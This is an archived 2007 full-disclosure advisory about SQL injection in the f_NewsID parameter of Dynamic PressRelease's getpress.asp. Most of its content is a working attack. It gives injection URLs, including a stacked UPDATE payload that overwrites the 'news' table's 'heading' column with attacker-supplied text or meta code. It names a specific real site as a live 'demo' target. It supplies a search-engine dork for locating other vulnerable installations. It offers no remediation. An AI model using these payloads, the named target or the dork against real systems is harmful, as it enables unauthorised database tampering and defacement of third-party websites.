Computer Security

Security Advisory: Dynamic PressRelease/getpress.asp sql injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] DVD Rental System multiple XSS and CSRF vulnerabilities

  [Aria-Security.Net] Gallery In A Box Username & Password Parameters SQL Injection

  [Aria-Security.Net] Next Gen Portfolio Manager SQL Injection

  la-nai cms_v1.2.14 - Remote SQL Injection

From:okan alp <codexploder_(at)_hotmail.com>
Date:03.08.2007
Subject:Dynamic PressRelease/getpress.asp sql injection

Dynamic PressRelease/getpress.asp sql injection


Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"

------------------------------------------------------------------

1-)  example.com/[patch]/getpress.asp?f_Category=News&f_NewsID=(sql methot)


1-)  example.com/dynamic/getpress.asp?f_Category=News&f_NewsID=(sql methot)

------------------------------------------------------------------

2-)  example.com/[patch]/getpress.asp?f_Category=News&f_NewsID=1'

2-) example.com/[patch]/getpress.asp?f_Category=News&f_NewsID=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--



#tbl    : news
#column : heading

###################################################################

sourge site : http://www.safetynews.com/

demo site   : http://www.nsca.org.au/dynamic/getpress.asp?f_Category=News&f_NewsID=260

order code for views sites :inurl:"getpress.asp?f_Category"

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru